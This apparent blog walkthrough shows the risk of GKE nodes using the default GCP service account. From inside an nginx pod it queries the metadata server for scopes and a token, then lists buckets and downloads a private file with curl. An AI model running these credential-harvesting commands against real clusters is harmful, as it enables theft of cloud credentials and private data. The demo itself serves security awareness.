Create a Cluster and Node Pool using the default service account
Create a pod and SSH to that pod
apiVersion: v1 kind: Pod metadata: name: nginx spec: containers: - name: nginx image: nginx
Create that nginx pod then SSH to it.
C:\Users\JMC\k8s>kubectl apply -f nginx.yml pod/nginx created C:\Users\JMC\k8s>kubectl exec -ti nginx bash kubectl exec [POD] [COMMAND] is DEPRECATED and will be removed in a future version. Use kubectl exec [POD] -- [COMMAND] instead. root@nginx:/#
Above shows we just SSH logged in to that pod with root access.
Let’s demo how this is GKE cluster and node pool with GCP default service account will get a very high-security risk.
A pod can access a list of permission/scopes via curl accessing its GCP metadata API. So this means a pod has access to write logs, access logging.write, etc.
root@nginx:/# curl -s -H "Metadata-Flavor: Google" https://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes https://www.googleapis.com/auth/devstorage.read_only https://www.googleapis.com/auth/logging.write https://www.googleapis.com/auth/monitoring https://www.googleapis.com/auth/servicecontrol https://www.googleapis.com/auth/service.management.readonly https://www.googleapis.com/auth/trace.append
A pod can get the GCP service account token
Let’s perform Server-Side Request Forgery (SSRF) attack!
Get the project ID. Below shows a pod was able to get the project ID
Get the GCP Cloud storage bucket names
curl -H "Authorization: Bearer TOKEN" "https://storage.googleapis.com/storage/v1/b?project=majestic-layout-340900"
So this is a private bucket with UniformBucketLevel access protection and `”uniformBucketLevelAccess” enabled which means the files are protected from public access
Below shows a pod can download a private content/file from a private bucket called
curl -H "Authorization: Bearer TOKEN" "https://storage.googleapis.com/storage/v1/b/private-bucket1/o/private.txt?generation=1648557043014755&alt=media" -o private.txt